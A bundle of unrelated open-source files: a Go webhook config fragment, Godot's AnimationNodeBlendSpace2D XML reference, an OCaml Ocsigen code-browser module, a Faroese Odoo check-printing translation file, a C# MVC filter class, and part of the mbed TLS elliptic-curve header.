ret.Service = &webhook.ClientConfigService{
Name: c.Service.Name,
Namespace: c.Service.Namespace,
}
if c.Service.Port != nil {
ret.Service.Port = *c.Service.Port
} else {
ret.Service.Port = 443
}
if c.Service.Path != nil {
ret.Service.Path = *c.Service.Path
}
}
return ret
}
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8" ?>
<class name="AnimationNodeBlendSpace2D" inherits="AnimationRootNode" version="4.0">
<brief_description>
Blends linearly between three [AnimationNode] of any type placed in a 2D space.
</brief_description>
<description>
A resource to add to an [AnimationNodeBlendTree].
This node allows you to blend linearly between three animations using a [Vector2] weight.
You can add vertices to the blend space with [method add_blend_point] and automatically triangulate it by setting [member auto_triangles] to [code]true[/code]. Otherwise, use [method add_triangle] and [method remove_triangle] to create up the blend space by hand.
</description>
<tutorials>
<link title="AnimationTree">https://docs.godotengine.org/en/latest/tutorials/animation/animation_tree.html</link>
</tutorials>
<methods>
<method name="add_blend_point">
<return type="void">
</return>
<argument index="0" name="node" type="AnimationRootNode">
</argument>
<argument index="1" name="pos" type="Vector2">
</argument>
<argument index="2" name="at_index" type="int" default="-1">
</argument>
<description>
Adds a new point that represents a [code]node[/code] at the position set by [code]pos[/code]. You can insert it at a specific index using the [code]at_index[/code] argument. If you use the default value for [code]at_index[/code], the point is inserted at the end of the blend points array.
</description>
</method>
<method name="add_triangle">
<return type="void">
</return>
<argument index="0" name="x" type="int">
</argument>
<argument index="1" name="y" type="int">
</argument>
<argument index="2" name="z" type="int">
</argument>
<argument index="3" name="at_index" type="int" default="-1">
</argument>
<description>
Creates a new triangle using three points [code]x[/code], [code]y[/code], and [code]z[/code]. Triangles can overlap. You can insert the triangle at a specific index using the [code]at_index[/code] argument. If you use the default value for [code]at_index[/code], the point is inserted at the end of the blend points array.
</description>
</method>
<method name="get_blend_point_count" qualifiers="const">
<return type="int">
</return>
<description>
Returns the number of points in the blend space.
</description>
</method>
<method name="get_blend_point_node" qualifiers="const">
<return type="AnimationRootNode">
</return>
<argument index="0" name="point" type="int">
</argument>
<description>
Returns the [AnimationRootNode] referenced by the point at index [code]point[/code].
</description>
</method>
<method name="get_blend_point_position" qualifiers="const">
<return type="Vector2">
</return>
<argument index="0" name="point" type="int">
</argument>
<description>
Returns the position of the point at index [code]point[/code].
</description>
</method>
<method name="get_triangle_count" qualifiers="const">
<return type="int">
</return>
<description>
Returns the number of triangles in the blend space.
</description>
</method>
<method name="get_triangle_point">
<return type="int">
</return>
<argument index="0" name="triangle" type="int">
</argument>
<argument index="1" name="point" type="int">
</argument>
<description>
Returns the position of the point at index [code]point[/code] in the triangle of index [code]triangle[/code].
</description>
</method>
<method name="remove_blend_point">
<return type="void">
</return>
<argument index="0" name="point" type="int">
</argument>
<description>
Removes the point at index [code]point[/code] from the blend space.
</description>
</method>
<method name="remove_triangle">
<return type="void">
</return>
<argument index="0" name="triangle" type="int">
</argument>
<description>
Removes the triangle at index [code]triangle[/code] from the blend space.
</description>
</method>
<method name="set_blend_point_node">
<return type="void">
</return>
<argument index="0" name="point" type="int">
</argument>
<argument index="1" name="node" type="AnimationRootNode">
</argument>
<description>
Changes the [AnimationNode] referenced by the point at index [code]point[/code].
</description>
</method>
<method name="set_blend_point_position">
<return type="void">
</return>
<argument index="0" name="point" type="int">
</argument>
<argument index="1" name="pos" type="Vector2">
</argument>
<description>
Updates the position of the point at index [code]point[/code] on the blend axis.
</description>
</method>
</methods>
<members>
<member name="auto_triangles" type="bool" setter="set_auto_triangles" getter="get_auto_triangles" default="true">
If [code]true[/code], the blend space is triangulated automatically. The mesh updates every time you add or remove points with [method add_blend_point] and [method remove_blend_point].
</member>
<member name="blend_mode" type="int" setter="set_blend_mode" getter="get_blend_mode" enum="AnimationNodeBlendSpace2D.BlendMode" default="0">
Controls the interpolation between animations. See [enum BlendMode] constants.
</member>
<member name="max_space" type="Vector2" setter="set_max_space" getter="get_max_space" default="Vector2( 1, 1 )">
The blend space's X and Y axes' upper limit for the points' position. See [method add_blend_point].
</member>
<member name="min_space" type="Vector2" setter="set_min_space" getter="get_min_space" default="Vector2( -1, -1 )">
The blend space's X and Y axes' lower limit for the points' position. See [method add_blend_point].
</member>
<member name="snap" type="Vector2" setter="set_snap" getter="get_snap" default="Vector2( 0.1, 0.1 )">
Position increment to snap to when moving a point.
</member>
<member name="x_label" type="String" setter="set_x_label" getter="get_x_label" default=""x"">
Name of the blend space's X axis.
</member>
<member name="y_label" type="String" setter="set_y_label" getter="get_y_label" default=""y"">
Name of the blend space's Y axis.
</member>
</members>
<signals>
<signal name="triangles_updated">
<description>
Emitted every time the blend space's triangles are created, removed, or when one of their vertices changes position.
</description>
</signal>
</signals>
<constants>
<constant name="BLEND_MODE_INTERPOLATED" value="0" enum="BlendMode">
The interpolation between animations is linear.
</constant>
<constant name="BLEND_MODE_DISCRETE" value="1" enum="BlendMode">
The blend space plays the animation of the node the blending position is closest to. Useful for frame-by-frame 2D animations.
</constant>
<constant name="BLEND_MODE_DISCRETE_CARRY" value="2" enum="BlendMode">
Similar to [constant BLEND_MODE_DISCRETE], but starts the new animation at the last animation's playback position.
</constant>
</constants>
</class>
| {
"pile_set_name": "Github"
} |
open Common
(* still needed? *)
open Eliom_pervasives
module Db = Database_php
module HC = Highlight_code
module H = HTML5.M
(*****************************************************************************)
(* Prelude *)
(*****************************************************************************)
(*
* The goal of this module is to provide a code browser a la LXR.
* See http://lxr.linux.no/#linux+v2.6.37.1/mm/compaction.c as an
* example.
*
* It's also an exercise in learning ocsigen. A code browser does
* not require anything fancy like Depot. No need for a ORM,
* or forms. Just need to htmlize a source file and add
* hrefs into it to make it hypertextable.
*
* todo: add search, add nice html, add fast html
*
* alternatives:
* - http://en.wikipedia.org/wiki/LXR_Cross_Referencer
* - http://en.wikipedia.org/wiki/OpenGrok
* - https://wiki.mozilla.org/DXR
*
*)
(*****************************************************************************)
(* Helpers *)
(*****************************************************************************)
let htmlize_dir ~link dir db =
let subdirs = Common.readdir_to_dir_list dir +> Common.sort in
let files = Common.readdir_to_file_list dir +> Common.sort in
let files = files +> Common.exclude (fun file ->
let (d,b,e) = Common.dbe_of_filename_noext_ok file in
e = "git_annot" || e = "cm_cache"
)
in
let elements = subdirs ++ files in
(H.html (*~a:[H.a_xmlns `W3_org_1999_xhtml; H.a_xml_lang "en"]*)
(H.head
(H.title (H.pcdata "XHTML"))
[
H.style [H.pcdata Htmlize_php2.style ]
])
(H.body
((H.h1 [H.pcdata dir] )
::
(elements +> List.map (fun subelement ->
let fullpath = Filename.concat dir subelement in
let readable = Db.absolute_to_readable_filename fullpath db in
[(*H.h3 [H.pcdata subelement]; *)
H.h1 [
Eliom_output.Html5.a link [H.pcdata readable] readable;
];
(* H.pre [H.pcdata readable]; *)
]
) +> List.flatten)
)
)
)
(*****************************************************************************)
(* Main entry point *)
(*****************************************************************************)
let main_service =
Eliom_services.service ["lxr"] (Eliom_parameters.string "path") ()
let _ = Eliom_output.Html5.register main_service
(fun readable_path () ->
(* todo? sanitized path ? *)
let path = Db.readable_to_absolute_filename readable_path Global_db.db in
let hook_token s tok categ =
match categ with
| Some (HC.Function (HC.Use2 _)) ->
(try
let id = Db.id_of_function s Global_db.db in
let file = Db.readable_filename_of_id id Global_db.db in
Eliom_output.Html5.a main_service [H.pcdata s] file
with (Not_found | Multi_found) as exn ->
Eliom_output.Html5.a main_service [H.pcdata s]
(Common.exn_to_s exn)
)
| _ -> H.pcdata s
in
let html =
if Common.is_directory path
then htmlize_dir ~link:main_service path Global_db.db
else Htmlize_php2.htmlize_with_headers ~hook_token path Global_db.db
in
Lwt.return html
)
| {
"pile_set_name": "Github"
} |
# Translation of Odoo Server.
# This file contains the translation of the following modules:
# * account_check_printing
#
# Translators:
# Martin Trigaux <[email protected]>, 2017
msgid ""
msgstr ""
"Project-Id-Version: Odoo Server 10.saas~18\n"
"Report-Msgid-Bugs-To: \n"
"POT-Creation-Date: 2017-09-20 09:53+0000\n"
"PO-Revision-Date: 2017-09-20 09:53+0000\n"
"Last-Translator: Martin Trigaux <[email protected]>, 2017\n"
"Language-Team: Faroese (https://www.transifex.com/odoo/teams/41243/fo/)\n"
"MIME-Version: 1.0\n"
"Content-Type: text/plain; charset=UTF-8\n"
"Content-Transfer-Encoding: \n"
"Language: fo\n"
"Plural-Forms: nplurals=2; plural=(n != 1);\n"
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_journal.py:58
#, python-format
msgid " : Check Number Sequence"
msgstr ""
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_payment.py:69
#, python-format
msgid "A check memo cannot exceed 60 characters."
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_account_payment_check_amount_in_words
#: model:ir.model.fields,field_description:account_check_printing.field_account_register_payments_check_amount_in_words
msgid "Amount in Words"
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.print_pre_numbered_checks_view
msgid "Cancel"
msgstr "Strika"
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_account_payment_check_number
#: model:ir.model.fields,field_description:account_check_printing.field_account_register_payments_check_number
msgid "Check Number"
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.view_account_journal_form_inherited
msgid "Check Printing"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_account_journal_check_printing_payment_method_selected
msgid "Check Printing Payment Method Selected"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_account_journal_check_sequence_id
msgid "Check Sequence"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,help:account_check_printing.field_account_journal_check_manual_sequencing
#: model:ir.model.fields,help:account_check_printing.field_account_payment_check_manual_sequencing
#: model:ir.model.fields,help:account_check_printing.field_account_register_payments_check_manual_sequencing
msgid "Check this option if your pre-printed checks are not numbered."
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.account_journal_dashboard_kanban_view_inherited
msgid "Check to print"
msgstr ""
#. module: account_check_printing
#: model:account.payment.method,name:account_check_printing.account_payment_method_check
msgid "Checks"
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.view_payment_check_printing_search
msgid "Checks To Print"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,help:account_check_printing.field_account_journal_check_sequence_id
msgid "Checks numbering sequence."
msgstr ""
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_journal.py:97
#, python-format
msgid "Checks to Print"
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.account_journal_dashboard_kanban_view_inherited
msgid "Checks to print"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks_create_uid
msgid "Created by"
msgstr "Byrjað av"
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks_create_date
msgid "Created on"
msgstr "Byrjað tann"
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks_display_name
msgid "Display Name"
msgstr "Vís navn"
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks_id
msgid "ID"
msgstr "ID"
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_payment.py:89
#, python-format
msgid ""
"In order to print multiple checks at once, they must belong to the same bank"
" journal."
msgstr ""
#. module: account_check_printing
#: model:ir.model,name:account_check_printing.model_account_journal
msgid "Journal"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks___last_update
msgid "Last Modified on"
msgstr "Seinast rættað tann"
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks_write_uid
msgid "Last Updated by"
msgstr "Seinast dagført av"
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks_write_date
msgid "Last Updated on"
msgstr "Seinast dagført tann"
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_account_journal_check_manual_sequencing
#: model:ir.model.fields,field_description:account_check_printing.field_account_payment_check_manual_sequencing
#: model:ir.model.fields,field_description:account_check_printing.field_account_register_payments_check_manual_sequencing
msgid "Manual Numbering"
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.view_account_bank_journal_form_inherited_check_printing
msgid "Manual Numbering of check"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,field_description:account_check_printing.field_account_journal_check_next_number
#: model:ir.model.fields,field_description:account_check_printing.field_print_prenumbered_checks_next_check_number
msgid "Next Check Number"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,help:account_check_printing.field_account_register_payments_check_number
msgid ""
"Number of the check corresponding to this payment. If your pre-printed check"
" are not already numbered, you can manage the numbering in the journal "
"configuration page."
msgstr ""
#. module: account_check_printing
#: model:ir.model,name:account_check_printing.model_account_payment
msgid "Payments"
msgstr ""
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_payment.py:86
#, python-format
msgid ""
"Payments to print as a checks must have 'Check' selected as payment method "
"and not have already been reconciled"
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.print_pre_numbered_checks_view
msgid ""
"Please enter the number of the first pre-printed check that you are about to"
" print on."
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.print_pre_numbered_checks_view
msgid "Print"
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.view_account_payment_form_inherited
msgid "Print Check"
msgstr ""
#. module: account_check_printing
#: model:ir.actions.server,name:account_check_printing.action_account_print_checks
msgid "Print Checks"
msgstr ""
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_payment.py:99
#: model:ir.model,name:account_check_printing.model_print_prenumbered_checks
#: model_terms:ir.ui.view,arch_db:account_check_printing.print_pre_numbered_checks_view
#, python-format
msgid "Print Pre-numbered Checks"
msgstr ""
#. module: account_check_printing
#: model:ir.model,name:account_check_printing.model_account_register_payments
msgid "Register payments on multiple invoices"
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,help:account_check_printing.field_account_journal_check_next_number
msgid "Sequence number of the next printed check."
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,help:account_check_printing.field_account_journal_check_printing_payment_method_selected
msgid ""
"Technical feature used to know whether check printing was enabled as payment"
" method."
msgstr ""
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_journal.py:26
#, python-format
msgid ""
"The last check number was %s. In order to avoid a check being rejected by "
"the bank, you can only use a greater number."
msgstr ""
#. module: account_check_printing
#: model:ir.model.fields,help:account_check_printing.field_account_payment_check_number
msgid ""
"The selected journal is configured to print check numbers. If your pre-"
"printed check paper already has numbers or if the current numbering is "
"wrong, you can change it in the journal configuration page."
msgstr ""
#. module: account_check_printing
#: code:addons/account_check_printing/models/account_payment.py:121
#, python-format
msgid ""
"There is no check layout configured.\n"
"Make sure the proper check printing module is installed and its configuration (in company settings > 'Configuration' tab) is correct."
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.print_pre_numbered_checks_view
msgid ""
"This will allow to save on payments the number of the corresponding check."
msgstr ""
#. module: account_check_printing
#: model_terms:ir.ui.view,arch_db:account_check_printing.view_account_payment_form_inherited
msgid "Unmark Sent"
msgstr ""
#. module: account_check_printing
#: model:ir.model,name:account_check_printing.model_wizard_multi_charts_accounts
msgid "wizard.multi.charts.accounts"
msgstr ""
| {
"pile_set_name": "Github"
} |
namespace Microsoft.Azure.Devices.Applications.PredictiveMaintenance.Web
{
using System.Web.Mvc;
public class FilterConfig
{
public static void RegisterGlobalFilters(GlobalFilterCollection filters)
{
filters.Add(new HandleErrorAttribute());
}
}
} | {
"pile_set_name": "Github"
} |
/**
* \file ecp.h
*
* \brief This file provides an API for Elliptic Curves over GF(P) (ECP).
*
* The use of ECP in cryptography and TLS is defined in
* <em>Standards for Efficient Cryptography Group (SECG): SEC1
* Elliptic Curve Cryptography</em> and
* <em>RFC-4492: Elliptic Curve Cryptography (ECC) Cipher Suites
* for Transport Layer Security (TLS)</em>.
*
* <em>RFC-2409: The Internet Key Exchange (IKE)</em> defines ECP
* group types.
*
*/
/*
* Copyright (C) 2006-2018, Arm Limited (or its affiliates), All Rights Reserved
* SPDX-License-Identifier: Apache-2.0
*
* Licensed under the Apache License, Version 2.0 (the "License"); you may
* not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*
* This file is part of Mbed TLS (https://tls.mbed.org)
*/
#ifndef MBEDTLS_ECP_H
#define MBEDTLS_ECP_H
#include "bignum.h"
/*
* ECP error codes
*/
#define MBEDTLS_ERR_ECP_BAD_INPUT_DATA -0x4F80 /**< Bad input parameters to function. */
#define MBEDTLS_ERR_ECP_BUFFER_TOO_SMALL -0x4F00 /**< The buffer is too small to write to. */
#define MBEDTLS_ERR_ECP_FEATURE_UNAVAILABLE -0x4E80 /**< The requested feature is not available, for example, the requested curve is not supported. */
#define MBEDTLS_ERR_ECP_VERIFY_FAILED -0x4E00 /**< The signature is not valid. */
#define MBEDTLS_ERR_ECP_ALLOC_FAILED -0x4D80 /**< Memory allocation failed. */
#define MBEDTLS_ERR_ECP_RANDOM_FAILED -0x4D00 /**< Generation of random value, such as ephemeral key, failed. */
#define MBEDTLS_ERR_ECP_INVALID_KEY -0x4C80 /**< Invalid private or public key. */
#define MBEDTLS_ERR_ECP_SIG_LEN_MISMATCH -0x4C00 /**< The buffer contains a valid signature followed by more data. */
#define MBEDTLS_ERR_ECP_HW_ACCEL_FAILED -0x4B80 /**< The ECP hardware accelerator failed. */
#ifdef __cplusplus
extern "C" {
#endif
/**
* Domain-parameter identifiers: curve, subgroup, and generator.
*
* \note Only curves over prime fields are supported.
*
* \warning This library does not support validation of arbitrary domain
* parameters. Therefore, only standardized domain parameters from trusted
* sources should be used. See mbedtls_ecp_group_load().
*/
typedef enum
{
MBEDTLS_ECP_DP_NONE = 0, /*!< Curve not defined. */
MBEDTLS_ECP_DP_SECP192R1, /*!< Domain parameters for the 192-bit curve defined by FIPS 186-4 and SEC1. */
MBEDTLS_ECP_DP_SECP224R1, /*!< Domain parameters for the 224-bit curve defined by FIPS 186-4 and SEC1. */
MBEDTLS_ECP_DP_SECP256R1, /*!< Domain parameters for the 256-bit curve defined by FIPS 186-4 and SEC1. */
MBEDTLS_ECP_DP_SECP384R1, /*!< Domain parameters for the 384-bit curve defined by FIPS 186-4 and SEC1. */
MBEDTLS_ECP_DP_SECP521R1, /*!< Domain parameters for the 521-bit curve defined by FIPS 186-4 and SEC1. */
MBEDTLS_ECP_DP_BP256R1, /*!< Domain parameters for 256-bit Brainpool curve. */
MBEDTLS_ECP_DP_BP384R1, /*!< Domain parameters for 384-bit Brainpool curve. */
MBEDTLS_ECP_DP_BP512R1, /*!< Domain parameters for 512-bit Brainpool curve. */
MBEDTLS_ECP_DP_CURVE25519, /*!< Domain parameters for Curve25519. */
MBEDTLS_ECP_DP_SECP192K1, /*!< Domain parameters for 192-bit "Koblitz" curve. */
MBEDTLS_ECP_DP_SECP224K1, /*!< Domain parameters for 224-bit "Koblitz" curve. */
MBEDTLS_ECP_DP_SECP256K1, /*!< Domain parameters for 256-bit "Koblitz" curve. */
MBEDTLS_ECP_DP_CURVE448, /*!< Domain parameters for Curve448. */
} mbedtls_ecp_group_id;
/**
* The number of supported curves, plus one for #MBEDTLS_ECP_DP_NONE.
*
* \note Montgomery curves are currently excluded.
*/
#define MBEDTLS_ECP_DP_MAX 12
/**
* Curve information, for use by other modules.
*/
typedef struct mbedtls_ecp_curve_info
{
mbedtls_ecp_group_id grp_id; /*!< An internal identifier. */
uint16_t tls_id; /*!< The TLS NamedCurve identifier. */
uint16_t bit_size; /*!< The curve size in bits. */
const char *name; /*!< A human-friendly name. */
} mbedtls_ecp_curve_info;
/**
* \brief The ECP point structure, in Jacobian coordinates.
*
* \note All functions expect and return points satisfying
* the following condition: <code>Z == 0</code> or
* <code>Z == 1</code>. Other values of \p Z are
* used only by internal functions.
* The point is zero, or "at infinity", if <code>Z == 0</code>.
* Otherwise, \p X and \p Y are its standard (affine)
* coordinates.
*/
typedef struct mbedtls_ecp_point
{
mbedtls_mpi X; /*!< The X coordinate of the ECP point. */
mbedtls_mpi Y; /*!< The Y coordinate of the ECP point. */
mbedtls_mpi Z; /*!< The Z coordinate of the ECP point. */
}
mbedtls_ecp_point;
#if !defined(MBEDTLS_ECP_ALT)
/*
* default mbed TLS elliptic curve arithmetic implementation
*
* (in case MBEDTLS_ECP_ALT is defined then the developer has to provide an
* alternative implementation for the whole module and it will replace this
* one.)
*/
/**
* \brief The ECP group structure.
*
* We consider two types of curve equations:
* <ul><li>Short Weierstrass: <code>y^2 = x^3 + A x + B mod P</code>
* (SEC1 + RFC-4492)</li>
* <li>Montgomery: <code>y^2 = x^3 + A x^2 + x mod P</code> (Curve25519,
* Curve448)</li></ul>
* In both cases, the generator (\p G) for a prime-order subgroup is fixed.
*
* For Short Weierstrass, this subgroup is the whole curve, and its
* cardinality is denoted by \p N. Our code requires that \p N is an
* odd prime as mbedtls_ecp_mul() requires an odd number, and
* mbedtls_ecdsa_sign() requires that it is prime for blinding purposes.
*
* For Montgomery curves, we do not store \p A, but <code>(A + 2) / 4</code>,
* which is the quantity used in the formulas. Additionally, \p nbits is
* not the size of \p N but the required size for private keys.
*
* If \p modp is NULL, reduction modulo \p P is done using a generic algorithm.
* Otherwise, \p modp must point to a function that takes an \p mbedtls_mpi in the
* range of <code>0..2^(2*pbits)-1</code>, and transforms it in-place to an integer
* which is congruent mod \p P to the given MPI, and is close enough to \p pbits
* in size, so that it may be efficiently brought in the 0..P-1 range by a few
* additions or subtractions. Therefore, it is only an approximative modular
* reduction. It must return 0 on success and non-zero on failure.
*
*/
typedef struct mbedtls_ecp_group
{
mbedtls_ecp_group_id id; /*!< An internal group identifier. */
mbedtls_mpi P; /*!< The prime modulus of the base field. */
mbedtls_mpi A; /*!< For Short Weierstrass: \p A in the equation. For
Montgomery curves: <code>(A + 2) / 4</code>. */
mbedtls_mpi B; /*!< For Short Weierstrass: \p B in the equation.
For Montgomery curves: unused. */
mbedtls_ecp_point G; /*!< The generator of the subgroup used. */
mbedtls_mpi N; /*!< The order of \p G. */
size_t pbits; /*!< The number of bits in \p P.*/
size_t nbits; /*!< For Short Weierstrass: The number of bits in \p P.
For Montgomery curves: the number of bits in the
private keys. */
unsigned int h; /*!< \internal 1 if the constants are static. */
int (*modp)(mbedtls_mpi *); /*!< The function for fast pseudo-reduction
mod \p P (see above).*/
int (*t_pre)(mbedtls_ecp_point *, void *); /*!< Unused. */
int (*t_post)(mbedtls_ecp_point *, void *); /*!< Unused. */
void *t_data; /*!< Unused. */
mbedtls_ecp_point *T; /*!< Pre-computed points for ecp_mul_comb(). */
size_t T_size; /*!< The number of pre-computed points. */
}
mbedtls_ecp_group;
/**
* \name SECTION: Module settings
*
* The configuration options you can set for this module are in this section.
* Either change them in config.h, or define them using the compiler command line.
* \{
*/
#if !defined(MBEDTLS_ECP_MAX_BITS)
/**
* The maximum size of the groups, that is, of \c N and \c P.
*/
#define MBEDTLS_ECP_MAX_BITS 521 /**< The maximum size of groups, in bits. */
#endif
#define MBEDTLS_ECP_MAX_BYTES ( ( MBEDTLS_ECP_MAX_BITS + 7 ) / 8 )
#define MBEDTLS_ECP_MAX_PT_LEN ( 2 * MBEDTLS_ECP_MAX_BYTES + 1 )
#if !defined(MBEDTLS_ECP_WINDOW_SIZE)
/*
* Maximum "window" size used for point multiplication.
* Default: 6.
* Minimum value: 2. Maximum value: 7.
*
* Result is an array of at most ( 1 << ( MBEDTLS_ECP_WINDOW_SIZE - 1 ) )
* points used for point multiplication. This value is directly tied to EC
* peak memory usage, so decreasing it by one should roughly cut memory usage
* by two (if large curves are in use).
*
* Reduction in size may reduce speed, but larger curves are impacted first.
* Sample performances (in ECDHE handshakes/s, with FIXED_POINT_OPTIM = 1):
* w-size: 6 5 4 3 2
* 521 145 141 135 120 97
* 384 214 209 198 177 146
* 256 320 320 303 262 226
* 224 475 475 453 398 342
* 192 640 640 633 587 476
*/
#define MBEDTLS_ECP_WINDOW_SIZE 6 /**< The maximum window size used. */
#endif /* MBEDTLS_ECP_WINDOW_SIZE */
#if !defined(MBEDTLS_ECP_FIXED_POINT_OPTIM)
/*
* Trade memory for speed on fixed-point multiplication.
*
* This speeds up repeated multiplication of the generator (that is, the
* multiplication in ECDSA signatures, and half of the multiplications in
* ECDSA verification and ECDHE) by a factor roughly 3 to 4.
*
* The cost is increasing EC peak memory usage by a factor roughly 2.
*
* Change this value to 0 to reduce peak memory usage.
*/
#define MBEDTLS_ECP_FIXED_POINT_OPTIM 1 /**< Enable fixed-point speed-up. */
#endif /* MBEDTLS_ECP_FIXED_POINT_OPTIM */
/* \} name SECTION: Module settings */
#else /* MBEDTLS_ECP_ALT */
#include "ecp_alt.h"
#endif /* MBEDTLS_ECP_ALT */
/**
* \brief The ECP key-pair structure.
*
* A generic key-pair that may be used for ECDSA and fixed ECDH, for example.
*
* \note Members are deliberately in the same order as in the
* ::mbedtls_ecdsa_context structure.
*/
typedef struct mbedtls_ecp_keypair
{
mbedtls_ecp_group grp; /*!< Elliptic curve and base point */
mbedtls_mpi d; /*!< our secret value */
mbedtls_ecp_point Q; /*!< our public value */
}
mbedtls_ecp_keypair;
/*
* Point formats, from RFC 4492's enum ECPointFormat
*/
#define MBEDTLS_ECP_PF_UNCOMPRESSED 0 /**< Uncompressed point format. */
#define MBEDTLS_ECP_PF_COMPRESSED 1 /**< Compressed point format. */
/*
* Some other constants from RFC 4492
*/
#define MBEDTLS_ECP_TLS_NAMED_CURVE 3 /**< The named_curve of ECCurveType. */
/**
* \brief This function retrieves the information defined in
* mbedtls_ecp_curve_info() for all supported curves in order
* of preference.
*
* \return A statically allocated array. The last entry is 0.
*/
const mbedtls_ecp_curve_info *mbedtls_ecp_curve_list( void );
/**
* \brief This function retrieves the list of internal group
* identifiers of all supported curves in the order of
* preference.
*
* \return A statically allocated array,
* terminated with MBEDTLS_ECP_DP_NONE.
*/
const mbedtls_ecp_group_id *mbedtls_ecp_grp_id_list( void );
/**
* \brief This function retrieves curve information from an internal
* group identifier.
*
* \param grp_id An \c MBEDTLS_ECP_DP_XXX value.
*
* \return The associated curve information on success.
* \return NULL on failure.
*/
const mbedtls_ecp_curve_info *mbedtls_ecp_curve_info_from_grp_id( mbedtls_ecp_group_id grp_id );
/**
* \brief This function retrieves curve information from a TLS
* NamedCurve value.
*
* \param tls_id An \c MBEDTLS_ECP_DP_XXX value.
*
* \return The associated curve information on success.
* \return NULL on failure.
*/
const mbedtls_ecp_curve_info *mbedtls_ecp_curve_info_from_tls_id( uint16_t tls_id );
/**
* \brief This function retrieves curve information from a
* human-readable name.
*
* \param name The human-readable name.
*
* \return The associated curve information on success.
* \return NULL on failure.
*/
const mbedtls_ecp_curve_info *mbedtls_ecp_curve_info_from_name( const char *name );
/**
* \brief This function initializes a point as zero.
*
* \param pt The point to initialize.
*/
void mbedtls_ecp_point_init( mbedtls_ecp_point *pt );
/**
* \brief This function initializes an ECP group context
* without loading any domain parameters.
*
* \note After this function is called, domain parameters
* for various ECP groups can be loaded through the
* mbedtls_ecp_load() or mbedtls_ecp_tls_read_group()
* functions.
*/
void mbedtls_ecp_group_init( mbedtls_ecp_group *grp );
/**
* \brief This function initializes a key pair as an invalid one.
*
* \param key The key pair to initialize.
*/
void mbedtls_ecp_keypair_init( mbedtls_ecp_keypair *key );
/**
* \brief This function frees the components of a point.
*
* \param pt The point to free.
*/
void mbedtls_ecp_point_free( mbedtls_ecp_point *pt );
/**
* \brief This function frees the components of an ECP group.
* \param grp The group to free.
*/
void mbedtls_ecp_group_free( mbedtls_ecp_group *grp );
/**
* \brief This function frees the components of a key pair.
* \param key The key pair to free.
*/
void mbedtls_ecp_keypair_free( mbedtls_ecp_keypair *key );
/**
* \brief This function copies the contents of point \p Q into
* point \p P.
*
* \param P The destination point.
* \param Q The source point.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_MPI_ALLOC_FAILED on memory-allocation failure.
*/
int mbedtls_ecp_copy( mbedtls_ecp_point *P, const mbedtls_ecp_point *Q );
/**
* \brief This function copies the contents of group \p src into
* group \p dst.
*
* \param dst The destination group.
* \param src The source group.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_MPI_ALLOC_FAILED on memory-allocation failure.
*/
int mbedtls_ecp_group_copy( mbedtls_ecp_group *dst, const mbedtls_ecp_group *src );
/**
* \brief This function sets a point to zero.
*
* \param pt The point to set.
*
* \return \c 0 on success.
* \return #MBEDTLS_ERR_MPI_ALLOC_FAILED on memory-allocation failure.
*/
int mbedtls_ecp_set_zero( mbedtls_ecp_point *pt );
/**
* \brief This function checks if a point is zero.
*
* \param pt The point to test.
*
* \return \c 1 if the point is zero.
* \return \c 0 if the point is non-zero.
*/
int mbedtls_ecp_is_zero( mbedtls_ecp_point *pt );
/**
* \brief This function compares two points.
*
* \note This assumes that the points are normalized. Otherwise,
* they may compare as "not equal" even if they are.
*
* \param P The first point to compare.
* \param Q The second point to compare.
*
* \return \c 0 if the points are equal.
* \return #MBEDTLS_ERR_ECP_BAD_INPUT_DATA if the points are not equal.
*/
